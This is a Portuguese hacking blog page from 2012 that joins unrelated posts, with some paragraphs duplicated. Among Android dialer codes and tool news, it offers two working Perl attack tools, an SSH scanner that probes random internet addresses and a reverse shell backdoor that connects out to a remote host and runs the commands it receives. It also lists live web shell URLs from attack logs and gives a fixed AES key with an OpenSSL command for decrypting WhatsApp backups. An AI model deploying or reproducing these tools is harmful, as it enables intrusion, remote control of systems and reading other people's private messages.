segunda-feira, dezembro 31, 2012
Google WIFI
Neste verão o Google oferece acesso gratuito WiFi para você ficar perto de
todos os seus amigos. Sejam aqueles à distância ou até os no smartphone ao lado. http://brasilfreewifi.withgoogle.com/

O Google irá oferecer acesso Wi-Fi gratuito em 150 bares de sete cidades brasileiras a partir deste sábado, 15/12. O projeto, batizado de Free WiFi, permitirá o acesso à internet a partir de smartphones, tablets ou computadores. Ao ativar o Wi-Fi no dispositivo, o aparelho irá identificar a rede do Google e, no primeiro acesso, o navegador web irá exibir alguns produtos da empresa com sugestão para baixa-los. A partir daí o uso dentro do estabelecimento passa a ser ilimitado.
Segundo o Google, a conexão utilizada será entre 10 Mbps ou 30 Mbps, dependendo do tipo de rede utilizada pelo bar (Wi-Fi ou fibra óptica, respectivamente), e será compartilhada entre todos os clientes do estabelecimento. Não haverá, ainda de acordo com a companhia, nenhum tipo de limitação ou restrição para a navegação.
Os 150 bares participantes estão listados no site oficial do projeto e podem ser encontrados nas cidades de São Paulo, Rio de Janeiro, Belo Horizonte, Curitiba, Porto Alegre, Florianópolis e Campinas. A iniciativa, exclusiva para o Brasil, foi criada pelo Google em parceria com a Enox On-Life Media e terá duração de 90 dias.
fonte
todos os seus amigos. Sejam aqueles à distância ou até os no smartphone ao lado. http://brasilfreewifi.withgoogle.com/

O Google irá oferecer acesso Wi-Fi gratuito em 150 bares de sete cidades brasileiras a partir deste sábado, 15/12. O projeto, batizado de Free WiFi, permitirá o acesso à internet a partir de smartphones, tablets ou computadores. Ao ativar o Wi-Fi no dispositivo, o aparelho irá identificar a rede do Google e, no primeiro acesso, o navegador web irá exibir alguns produtos da empresa com sugestão para baixa-los. A partir daí o uso dentro do estabelecimento passa a ser ilimitado.
Segundo o Google, a conexão utilizada será entre 10 Mbps ou 30 Mbps, dependendo do tipo de rede utilizada pelo bar (Wi-Fi ou fibra óptica, respectivamente), e será compartilhada entre todos os clientes do estabelecimento. Não haverá, ainda de acordo com a companhia, nenhum tipo de limitação ou restrição para a navegação.
Os 150 bares participantes estão listados no site oficial do projeto e podem ser encontrados nas cidades de São Paulo, Rio de Janeiro, Belo Horizonte, Curitiba, Porto Alegre, Florianópolis e Campinas. A iniciativa, exclusiva para o Brasil, foi criada pelo Google em parceria com a Enox On-Life Media e terá duração de 90 dias.
fonte
Secret's Code Android
| In Android

*#*#4636#*#*
Codigo que mostra algumas informações sobre seu telefone e a bateria do mesmo, ao digita-lo aparecem 4 menus na tela:
* Informações do telefone
* Informações da bateria
* Histórico da Bateria
* Estatísticas de uso do telefone
*#*#7780#*#*
CUIDADO - Digitando este codigo ele vai “resetar” seu telefone com as informações originais de fábrica, vai remover as seguintes “coisas” do seu telefone:
Apagar sua conta do Google
Apagar os aplicativos de sistema e arquivo de dados
Apagar os aplicativos que você fez download.
Não vai remover:
* Sistema “operacional” do telefone
* Arquivos do seu cartão SD.
*2767*3855#
CUIDADO – Este código faz o mesmo que o citado acima, porem, também apaga seu cartão de memoria e todos os arquivos nele e ainda mais, faz a reinstalação do software original do telefone.
*#*#34971539#*#*
Codigo usado para receber informações sobre a câmera do telefone – Vai mostrar 4 menus:
Atualizar o software da câmera (NÃO TENTE ISTO)
Atualizar o software da câmera usando um arquivo que esteja no SD
Mostra a versão do software da câmera
Mostra se é possível fazer a atualização do software.
CUIDADO: Nunca use a opção numero 1 (Atualizar software da câmera) senão você tera que enviar seu telefone para a assistência técnica para reinstalar o software da câmera.
*#*#7594#*#*
Com este codigo você pode mudar a maneira que o botão de desligar funciona. Mudando esta opção você pode optar por “desligar o telefone” ao apertar e segurar o botão (ao invés de aparecer a tela “Modo Avião,etc”)
*#*#273283*255*663282*#*#*
Este código abre uma opção de backup ou copia dos arquvios do seu sistema e você poderá fazer um backup das suas imagens, videos, sons e muito mais.
*#*#197328640#*#*
Muda seu telefone para modo de serviço onde é possível fazer testes no seu aparelho. Abre a opção de testar o Bluetooh, Wlan e o GPS.
*#*#232338#*#*
Mostra o MAC address do Wifi
*#*#1472365#*#*
GPS test
*#*#1575#*#*
Outro teste de GPS
*#*#232331#*#*
Teste de Bluetooth
*#*#232337#*#
Mostra o endereço do Bluetooth
*#*#8255#*#*
Este código mostra o Monitor de serviço do GoogleTALK.
Codigos para obter versão de “firmware”:
*#*#4986*2650468#*#* – PDA, Phone, H/W, RFCallDate
*#*#1234#*#* – PDA e Telefone
*#*#1111#*#* – FTA SW Version
*#*#2222#*#* – FTA HW Version
*#*#44336#*#* – PDA, Phone, CSC, Build Time, Changelist number
Codigos para fazer testes de fábrica:
*#*#0283#*#* – Packet Loopback
*#*#0*#*#* – LCD test
*#*#0673#*#* OR *#*#0289#*#* – Melody test
*#*#0842#*#* – Device test (Vibration test and BackLight test)
*#*#2663#*#* – Versão da tela sensível ao toque
*#*#2664#*#* – Teste da tela sensível ao toque
*#*#0588#*#* – Teste do sensor de proximidade
*#*#3264#*#* – RAM version
Read more: http://eusouandroid.com/todos-os-codigos-para-seu-android/#ixzz2Gg9osBMK
Web Shells and RFIs Collection
Web Shells and RFIs Collection
I
wrote a little script to periodically look through my web logs for
unique RFIs and Web Shells, and then collect them on one page where I
can go look at them or download them to add to my Web Shell library.
Many of these attacks are repeated multiple time, so I ignore the time
fields in judging if an RFI/Web Shell is unique. I've coded it to weed
out links to Web Shells that 404. I also use nofollow and a referrer
hiding service so it does not look like I'm attacking anyone with the
web shells (but the check for 404 sort of looks suspicious). This page
will also let you link off to firebwall.com
where you can use their PHP decoder to look at the obfuscated code.
Enjoy my Web Shell zoo, it should update itself every hour or so. If you
see your domain on the list of websites hosting Web Shells you are
likely pwned and should clean up your server.Attacker | Whois IP | Request | View on PHP Decoder | Agent | Referer | Time |
187.40.82.13 | Whois | http://www.amerint.com.br/plugins/system/chupa.txt? | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 24/Dec/2012:19:47:31 -0800 |
187.40.81.59 | Whois | http://www.goodigood.com/mcharge/php/class//ekta.txt? | View on PHP Decoder | - | - | 20/Dec/2012:13:48:06 -0800 |
186.249.211.224 | Whois | http://www.goodigood.com/mcharge/php/class//dek.txt? | View on PHP Decoder | - | - | 20/Dec/2012:01:16:04 -0800 |
189.90.43.3 | Whois | http://www.qualityom.com.br/plugins/system/ip.txt? | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 18/Dec/2012:12:17:48 -0800 |
187.58.105.54 | Whois | http://c99.gen.tr/c99.txt? | View on PHP Decoder | Mozilla/5.0 (Windows NT 5.1; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 | - | 17/Dec/2012:13:26:10 -0800 |
187.40.106.182 | Whois | http://www.luvex.com.br/teste/riko.txt? | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 16/Dec/2012:20:34:42 -0800 |
200.98.143.17 | Whois | http://www.goodigood.com/mainfiles/teste.txt? | View on PHP Decoder | - | - | 14/Dec/2012:16:12:49 -0800 |
189.72.209.60 | Whois | http://casamarvera10.cwahi.net/tester.txt?? | View on PHP Decoder | Mozilla/3.0 (compatible; Indy Library) | - | 13/Dec/2012:13:57:09 -0800 |
200.98.143.17 | Whois | http://www.goodigood.com/mainfiles/inside.txt? | View on PHP Decoder | - | - | 13/Dec/2012:04:38:05 -0800 |
81.177.22.64 | Whois | http://adamhomes.co.uk/scripts/id1.txt? | View on PHP Decoder | Mozilla/5.0 | - | 13/Dec/2012:01:15:11 -0800 |
118.97.95.231 | Whois | http://ijencrew.wapsite.me/bnc.ichat.txt?? | View on PHP Decoder | Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0 | - | 11/Dec/2012:09:04:35 -0800 |
190.188.186.123 | Whois | http://mobile.asnieres-sur-seine.fr/data/hjkjyuf43.txt? | View on PHP Decoder | Mozilla/3.0 (compatible; Indy Library) | - | 09/Dec/2012:17:21:14 -0800 |
187.40.111.9 | Whois | http://www.khonkaenrongyen.com/plugins/cmd2.txt? | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 06/Dec/2012:20:58:26 -0800 |
187.40.103.247 | Whois | http://www.jcestetica.com.br/plugins/system/r57.txt?? | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 06/Dec/2012:06:38:05 -0800 |
111.68.215.186 | Whois | http://www.sungeundongsan.org/zb/id.txt? | View on PHP Decoder | libwww-perl/5.805 | - | 05/Dec/2012:21:35:42 -0800 |
200.98.129.248 | Whois | http://www.ideocondo.com/php/new/flood/Scripts/g.txt? | View on PHP Decoder | Mozilla/3.0 (compatible; Indy Library) | - | 03/Dec/2012:18:45:35 -0800 |
200.98.164.226 | Whois | http://swiatodziezy.com/libraries/inside.txt? | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 02/Dec/2012:10:11:41 -0800 |
177.6.107.193 | Whois | http://www.kini-kini.com/ancien_kini/optms.txt? | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 29/Nov/2012:03:43:41 -0800 |
5.39.9.95 | Whois | http://www.dunkerquepromotion.org/images/temoignages/danger.txt?? | View on PHP Decoder | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1 | - | 27/Nov/2012:16:21:38 -0800 |
111.119.184.52 | Whois | http://c99.gen.tr/c99.txt | View on PHP Decoder | Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0 | - | 26/Nov/2012:22:24:24 -0800 |
200.98.140.97 | Whois | http://www.ntempreco.com/teste.txt?? | View on PHP Decoder | Mozilla/3.0 (compatible; Indy Library) | - | 26/Nov/2012:16:29:14 -0800 |
200.98.129.118 | Whois | http://www.asiandogs.ru/dog/id1.txt?? | View on PHP Decoder | Mozilla/5.0 | - | 24/Nov/2012:16:48:24 -0800 |
189.73.212.194 | Whois | http://galaxiauniversal.com/css/optms.txt? | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 24/Nov/2012:03:09:29 -0800 |
187.40.94.178 | Whois | http://www.jcestetica.com.br/plugins/system/r57.txt? | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 20/Nov/2012:12:21:40 -0800 |
176.254.215.142 | Whois | http://www.drivehq.com/web/v3nd3tta/shells/c99.txt? | View on PHP Decoder | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 | - | 18/Nov/2012:15:45:22 -0800 |
177.25.109.82 | Whois | http://egyptinsideout.com/plugins/system/nnframework/images/tester.txt? | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 17/Nov/2012:04:26:40 -0800 |
189.74.19.227 | Whois | http://pc.eromil.com/goza.txt? | View on PHP Decoder | Mozilla/3.0 (compatible; Indy Library) | - | 16/Nov/2012:15:47:09 -0800 |
200.98.171.238 | Whois | http://acesso9583.hut4.ru/tester.txt? | View on PHP Decoder | - | - | 14/Nov/2012:16:43:05 -0800 |
201.15.114.66 | Whois | http://www.buy-nippon-motors.com/com/js/swfobject/optms.txt | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 14/Nov/2012:14:58:25 -0800 |
187.90.77.194 | Whois | http://www.xambre.pr.gov.br/plugins/system/tester.txt? | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 14/Nov/2012:08:46:22 -0800 |
189.48.124.171 | Whois | http://egyptinsideout.com/plugins/system//tooltips/images/tester.txt? | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 14/Nov/2012:06:18:24 -0800 |
189.1.174.192 | Whois | http://www.wushu.org.ge/e107_images/david.txt | View on PHP Decoder | Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1 | - | 13/Nov/2012:17:23:57 -0800 |
201.24.16.247 | Whois | http://produtosmaster.com/sonaberadinha.txt? | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 09/Nov/2012:04:25:14 -0800 |
189.73.213.247 | Whois | http://produtosmaster.com/sonaberadinha.txt | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 08/Nov/2012:10:35:59 -0800 |
5.39.9.95 | Whois | http://swjzaleze.ovh.org/swietlica_15/danger.txt?? | View on PHP Decoder | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1 | - | 04/Nov/2012:08:49:21 -0800 |
49.156.155.246 | Whois | http://ead-aerospace.com/Intranet/Dossiers/Customers/2/c99.txt | View on PHP Decoder | Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4 | - | 01/Nov/2012:07:32:59 -0700 |
72.55.132.168 | Whois | http://jamina.vacau.com/e107_admin/raw.txt?? | View on PHP Decoder | Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511 | - | 26/Oct/2012:20:12:31 -0700 |
64.20.38.154 | Whois | http://c99.gen.tr/r57.txt?&security/changemac | View on PHP Decoder | Snoopy v1.2.4 | - | 24/Oct/2012:11:12:35 -0700 |
64.20.38.154 | Whois | http://c99.gen.tr/r57.txt?&security/windows-forensics-registry-and-file-system-spots | View on PHP Decoder | Snoopy v1.2.4 | - | 24/Oct/2012:11:09:59 -0700 |
64.20.38.154 | Whois | http://c99.gen.tr/r57.txt?&security/networkprinterhacking | View on PHP Decoder | Snoopy v1.2.4 | - | 24/Oct/2012:10:35:49 -0700 |
177.0.49.124 | Whois | http://www.jkchemicals.in/wp-content/themes/Chameleon/cache/shell.txt | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 20/Oct/2012:18:22:20 -0700 |
186.247.205.162 | Whois | http://www.acfinance.com.br/tool.txt? | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 18/Oct/2012:09:45:34 -0700 |
200.98.164.62 | Whois | http://c99.gen.tr/c99.txt?? | View on PHP Decoder | Mozilla/3.0 (compatible; Indy Library) | - | 17/Oct/2012:16:42:06 -0700 |
217.71.106.39 | Whois | http://www.avidsen.com/2009/danger.txt???? | View on PHP Decoder | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 | - | 17/Oct/2012:05:41:12 -0700 |
63.143.40.27 | Whois | http://www.nysnagard.no/mail.txt? | View on PHP Decoder | Mozilla/3.0 (compatible; Indy Library) | - | 04/Oct/2012:08:25:27 -0700 |
187.40.106.157 | Whois | http://www.akakaslogistics.com/manolo.txt? | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 02/Oct/2012:22:20:27 -0700 |
Crawljax Web Applications
| In Security Software

“Crawljax helps you crawl Ajax-based web applications. Crawljax is an open source Java tool for automatically crawling and testing modern (Ajax) web applications. It can crawl any Ajax-based web application by firing events and filling in form data. It creates a state-flow graph of the dynamic DOM states and the transitions between them. It is a plugin-driven architecture.”
Changes made to Crawljax 2.0:
- Fixed issue 55: State can be represented by multiple StateVertix objects
- Fixed issue 57: XPathHelper.formatXPath(String xpath) doesn’t handle axes.
- Added Mobilecrawl. Make crawling web apps on Android and iPhone possible.
- Use temp files for unit tests
- Updated JUnit asserts to new version
- Removed try catch blocks that add nothing to functionality
- Removed duplicate code by extracting into methods
- Removed duplicate code by using JUnit functionality
- Moved test/site into test/resources/site because it’s a test resource.
- Removed empty test ElementResolverTest.java
- Fixed issue 61: tests don’t need external resources anymore. Tests can now delcare a classrule that starts an embedded Jetty server to server the pages locally so we are not dependend on external sites anymore.
- Enhancement: Tests should not depend on external resources. Some of the test now depend on external websites like google.com. It’s makes the test suite dependent and might cause different test results while the code doesn’t change.
- Fixed tests time out or hang on Mac OS-X using Firefox
- Fixed XPathHelper.formatXPath(String xpath) doesn’t handle axes.
- State can be represented by multiple StateVertix objects
Download Crawljax: Crawljax 2.1 - crawljax-src-2.1.zip/ Binary – crawljax-2.1.zip
Hackplayer's Videos.
50 mais vistos
Hackplayers
- hackplayers: Blogroll em espanhol
- Sexting e fraude em estudantes Deusto
- LOIC: ferramenta de DDoS utilizado por Anonymous
- Faces "tesão" em chat do Facebook
- WhatsApp: como enviar uma imagem com uma prévia falsa
- Reaver-WPS: ataques de força bruta contra WPS
- Backtrack 5 Tutoriais
- WhatsAppSniffer: conversas WhatsApp capturar facilmente
- hackplayers: Inglés Blogroll
- O dia 9 de Anônimo concorda Capio sites
- Bloquear Oficina colheita # 3: Ferramentas ganzuado
- Compilação de recursos Noel malwares análise Valca
- Bloquear escolher Oficina 2: Técnicas de abertura
- WiFite: rachaduras redes sem fio para manequins
- hackplayers: Desafios Hackplayers
- 50 tutoriais para Unix Systems Administrator / Linux
- Bloquear Oficina colheita # 1: Introdução
- Desafio 10: ver o padrão de desbloqueio
- Primeiro dia explora 0 para o Windows 8
- Nmap: port scanner para o scanner de vulnerabilidade
- Mergulho profundo na Internet
- A Vingança dos Anónimos (se Amanda Todd)
- Backdoor oculta no Windows
- Disponíveis BackTrack 5 R3!
- Backdoor PHP Weevely escondido em um metadados JPG
- Vulnerabilidade no Skype permite que o IP de qualquer usuário
- Backdoors web em imagens: melhorar a técnica
- Um passo além do antivírus. Sandboxie
- Transforme seu Firefox em um keylogger invisível
- Sobre a forma como a esgueirar-se para o metrô em um elegante ... (NFC hack)
- Quebrar redes Wi-Fi com o Android (em modo monitor)
- Como ignorar a autenticação do Microsoft SQL Server em um servidor já comprometidos (pós-operatório)
- O velho truque de teclas de aderência ainda trabalhava
- Evasão do limite de 140 caracteres do Twitter por CESU-8 Codificação
- Votação para os melhores da web técnicas de invasão de 2011
- Santoku: distribuição de segurança móvel
- Top 10 da Web técnicas de hackers em 2010
- Session Hijacking por DroidSheep
- Como abrir um cadeado combinações testadas em 100
- Digitalização com nmap através do Tor
- RAT DarkComet termina
- Qual é o melhor firewall de rede?
- Solução para desafiar 3 Bahrain GP
- Metasploit Autopwn
- CRIME: o novo ataque em SSL / TLS sucessor BEAST
- Anti: a partir de simples pentesting Android
- De 0x90 para 0x4c454554, uma viagem para a exploração
- Livro: O Hacker Bíblia 2009
- Injeção de SQL explora facilmente com Havij
- hackplayers: Twitters da trilha
-
Decifrando o arquivo WhatsApp msgstore.db.crypt
As mensagens de dados WhatsApp são armazenados em um formato de arquivo SQLite. Para telefones IOS este arquivo está no caminho: [ID] App / Documents / ChatStorage.sqlite e, no caso de telefones Android em / com.whatsapp / databases / msgstore.db. Este arquivo é criptografado como Yago disse no ano passado e isso requer o telefone para acessar o jailbreakedo.
No caso de haver também arquivo de backup Android é armazenado no cartão de memória externa, nem foi criptografado. Isso mudou em uma atualização de aplicativo que sofreu após comentários de Iago. Dessa forma, se o telefone for perdido ou roubado, o cartão, mesmo se eles não podem ler as mensagens.
Infelizmente, o aplicativo usa criptografia (AES-192-BCE) no arquivo de backup sempre feito usando a mesma chave (346a23652a46392b4d73257c67317e352e3372482177652c), e nenhum fator único para cada dispositivo, de modo que você pode recuperar mensagens de qualquer Da mesma forma móvel e em poucos segundos.
Se por qualquer motivo você se vê nesta situação, para descriptografar o arquivo e acessar o banco de dados pode ser feito facilmente com OpenSSL ( fonte e binário para Windows ), com o seguinte comando, onde você especificar apenas o arquivo de entrada (-in) e saída (-out) com os nomes correspondentes:
Para aqueles que querem ainda mais fácil, eu coloquei um site temporário até reiniciar automaticamente o arquivo criptografado: http://www.recovermessages.com/ .
openssl enc -d -aes-192-ecb -in msgstore-1.db.crypt -out msgstore.db.sqlite -K 346a23652a46392b4d73257c67317e352e3372482177652c
Uma vez decifrado, você deve usar um gerenciador de SQLite para abrir o arquivo, como Administrador SQLite
Os criadores de Xtract (Fabio Sangiacomo e Martina Weidner) já havia encontrado esta, em dezembro de 2011 e teve a sua ferramenta e um excelente documento explicando como foram obtidos:
http://forum.xda-developers.com/showthread.php?p=24569917
https://code.google.com/p/hotoloti/downloads/list
https://www.os3.nl/_media/2011-2012/students/ssn_project_report.pdf
http://www.securitybydefault.com/2012/05/descifrando-el-fichero-msgstoredbcrypt.html
quinta-feira, dezembro 13, 2012
apagando rastros de Invasão II
" Yeap! i'm a haxor cat stupid admin! :D "
Update [31/12/2012]
- antes de mais nada quero ressaltar que todas as informações aqui postadas, são de caráter Educativo,é como uma " espada" com ela nas mãos você pode matar e pode se defender , cabe a você a sua escola! .... Recentemente ouvi de um companheiro " poxa kembolle, não cai bem você realizados postagens " l33thaxor" em seu blog, isso não soa bem para os negócios, nem para seu grau de estudo."
Achei importante a Observação todos aqui sabe como atacar, "defender é que é o difícil." Gosto muito do Alexos,[http://blog.alexos.com.br/ ] é profissional em que me inspiro muito em meus trabalhos,esse tipo de conteúdo você não encontra em certificações e só o famoso " underground" ensina. Vejamos aqui exemplo simples de como utilizar Perl para otimizar diversas rotinas [Sysadmin] . Nosso atacante apos realizado a intrusão utiliza ferramentas como esta para apagar rastros após o crime;
Observem que são so diretorios de 3 Sistemas Operacionais, 'linux', 'aix', 'sunos' nada que impeça de ser implementado para senhor Gates $$ também (: onde provavemente peritos iriam procurar rastros do seu ataque . Pois bem.. Existem Melhores praticas que auxiliam o administrador a se prevenir dos ataques realizados, e caso ela ocorra tenha uma contra medida, " fato" . Mas ninguém usa servidor de log's hoje em dia, quase toda empresa não tem rotina de beckup, não são afirmações só feita por sim, e sim por vários especialistas da área . Nessas horas um pote de mel, Ajuda no procedimento , ou não? ....
- antes de mais nada quero ressaltar que todas as informações aqui postadas, são de caráter Educativo,é como uma " espada" com ela nas mãos você pode matar e pode se defender , cabe a você a sua escola! .... Recentemente ouvi de um companheiro " poxa kembolle, não cai bem você realizados postagens " l33thaxor" em seu blog, isso não soa bem para os negócios, nem para seu grau de estudo."
Achei importante a Observação todos aqui sabe como atacar, "defender é que é o difícil." Gosto muito do Alexos,[http://blog.alexos.com.br/ ] é profissional em que me inspiro muito em meus trabalhos,esse tipo de conteúdo você não encontra em certificações e só o famoso " underground" ensina. Vejamos aqui exemplo simples de como utilizar Perl para otimizar diversas rotinas [Sysadmin] . Nosso atacante apos realizado a intrusão utiliza ferramentas como esta para apagar rastros após o crime;
Observem que são so diretorios de 3 Sistemas Operacionais, 'linux', 'aix', 'sunos' nada que impeça de ser implementado para senhor Gates $$ também (: onde provavemente peritos iriam procurar rastros do seu ataque . Pois bem.. Existem Melhores praticas que auxiliam o administrador a se prevenir dos ataques realizados, e caso ela ocorra tenha uma contra medida, " fato" . Mas ninguém usa servidor de log's hoje em dia, quase toda empresa não tem rotina de beckup, não são afirmações só feita por sim, e sim por vários especialistas da área . Nessas horas um pote de mel, Ajuda no procedimento , ou não? ....
SSH Scanner & Banner Grabber

Bom Dia Senhores!!
- Segue uma ótima aplicação para encontrar serviços SSH ativos .
#!/usr/bin/perl
$found = 0;
$num = 0;
use IO::Socket::INET;
use IO::Socket;
sub ipgen(){
my $range1 = 223;
my $range2 = 254;
$oct1 = int(rand($range1)) + 1;
$oct2 = int(rand($range2)) + 1;
$oct3 = int(rand($range2)) + 1;
$oct4 = int(rand($range2)) + 1;
if($oct1 == 127 || $oct1 == 172 || $oct1 == 192 || $oct1 == 10){
$ip = &ipgen();
}else{
$ip = "$oct1.$oct2.$oct3.$oct4";
}
return $ip;
}
$port=22;
$file="OutSSH.txt";
while(1==1){
$target = &ipgen();
my $sock = new IO::Socket::INET (
PeerAddr => $target,
PeerPort => $port,
Proto => 'tcp',
Timeout => '2',
);
system("cls");
$num = $num+1;
print q{
____ ____ _ _
/ ___/ ___|| | | | ___ ___ __ _ _ __
\___ \___ \| |_| | / __|/ __/ _` | '_ \
___) |__) | _ | \__ \ (_| (_| | | | |
|____/____/|_| |_| |___/\___\__,_|_| |_|
SSH Scanner & Banner Grabber
};
print "Found:$found Scanning Port:$port\n";
print "IPs Scanned:$num\n";
if($sock){
$sssh = IO::Socket::INET->new(PeerAddr=>$target,PeerPort=>$port,Timeout=>"2");
if ($sssh) {
while (<$sssh>) {
$banner=$_;
close($sssh);
}
}
if (!defined($banner)){
$banner="Dead Port";
}
$found = $found+1;
open(DAT, ">>$file") || die("Cannot Open Output File");
print DAT "$target : $banner\n";
close(DAT);
}
close($sock);
}
TCP Remote Shell
hy dudes! (:
#!/usr/bin/perl
#Coder FroZ3N
#Have Fun :)
use Sys::Hostname;
use IO::Socket::INET;
use Cwd;
my $machinename = hostname;
my $host = $ENV{LOGNAME} || $ENV{USER} || getpwuid(lt;);
my $path = getcwd;
my $hostname = $host.'@'.$machinename.":~$curdir# ";
$| =1;
$ip = $ARGV[0];
$port = $ARGV[1];
unless($ip and $port)
{ print q{
(+) Script Name : bdoor.pl
(+) Script CodeR : FroZeN
(+) Script Usage : ./bdoor.pl ip port
(+) Example : ./badoor.pl rooted.no-ip.org 1337
(+) Greetings : AnalyseR, Delirium, AmonR@, Drarqua , Rizla
};
}
$socket = new IO::Socket::INET(
PeerHost => $ip,
PeerPort => $port,
Proto => 'tcp',
) or die " (-) Socket Error : $!\n";
while(1)
{
showname();
while(<$socket>)
{
$cd = 'cd ';
$cma = $_;
if($cma =~ $cd)
{
@array = split ($cd , $cma);
chomp($array[1]);
$path = $array[1];
}
my @rec = qx{$_};
@command = join('',@rec);
foreach $line(@command)
{
print $socket "$line";
}
showname();
}
}
print $socket "\n";
$socket->close();
sub showname {
chdir($path);
my $curdir = getcwd;
my $hostname = $host.'@'.$machinename.":~$curdir# ";
print $socket $hostname;
}
segunda-feira, dezembro 10, 2012
terça-feira, dezembro 04, 2012
(Cheat Sheet) de segurança da Informação
Boa tarde Senhores e Senhoras (:
Recentemente acompanhei algumas listas de comunicação alguns Sheet's que andarão rolando sobre segurança da informação e decidi compartilhar aqui neste humilde espaço com vocês, as mesmas servem para analistas de segurança, peritos em computação forense, desenvolvedores e demais atividades correlatas a Tecnologia. de Antemão agradeço ao mcsesolution pela reunião e contribuição das informações aqui disponibilizadas!
No mais é isso! Aquele abraço []'s
Recentemente acompanhei algumas listas de comunicação alguns Sheet's que andarão rolando sobre segurança da informação e decidi compartilhar aqui neste humilde espaço com vocês, as mesmas servem para analistas de segurança, peritos em computação forense, desenvolvedores e demais atividades correlatas a Tecnologia. de Antemão agradeço ao mcsesolution pela reunião e contribuição das informações aqui disponibilizadas!
No mais é isso! Aquele abraço []'s
domingo, dezembro 02, 2012
NetSniff-ng
NetSniff-ng é um alto desempenho de rede do Linux sniffer para inspeção de pacotes. É semelhante aos analisadores tcpdump como, mas sem a necessidade de realizar as chamadas do sistema de busca de pacotes de rede. Uma área de memória mapeada dentro de espaço do kernel será usado para acessar pacotes, por isso não há necessidade de copiá-los para o userspace (um mecanismo de "zero-cópia"). Para este fim, NetSniff-ng é libpcap independente, mas, no entanto, suporta o formato de arquivo pcap para capturar, repetindo, e realizando análise offline de lixões pcap.
O projeto está focado na construção de um analisador robusto, limpo e seguro e utilitários que completa NetSniff-ng como um suporte para testes de penetração. NetSniff-ng pode ser usado para análise de protocolo, engenharia reversa, e depuração de rede.
Notas de versão V0.5.7: Esta versão corrige uma série de bugs, limpa o código e adiciona novos recursos, incluindo suporte 802,11 cru e uma língua nova configuração de pacotes para trafgen.
Download: http://packages.debian.org/search?suite=all&keywords=netsniff-ng
SMPPS (packet sniffer Simples Multi Protocol)
Os SMPPS (packet sniffer Simples Multi Protocol) é um projeto de código aberto baseado em C e soquetes simples, a finalidade do mesmo é obter software livre, funcional e robusto do que o princípio da captura de pacotes IP protocolos, TCP, UDP, ICMP e IGMP e controlar a forma de uma interface visual em modo de texto o tamanho da corrente de pacotes a ser transmitido na rede são classificados por protocolo, bem como o volume total e da quantidade de outros pacotes, tais como ARP.
O projeto desse princípio em face do desenvolvimento e por enquanto só pode capturar pacotes como TCP / IP, mas também pode criar um arquivo de log e modo de visualização depois de todo o fluxo capturado em uma detalhada e intuitiva para permitir fácil de analisar o tráfego de rede . Outro detalhe é que ele focado apenas e para uso em sistemas UNIX e para ajudar os administradores de rede e sistemas, programadores, desenvolvedores, hackers éticos pentesters e similares.
Download: smpps-0.9.0 (18,0 kB)
Download : smpps-0.9.0 (18.0 kB)
Find Other Version |
Read more in here : http://cr4sh-dump.xp3.biz/smpps.html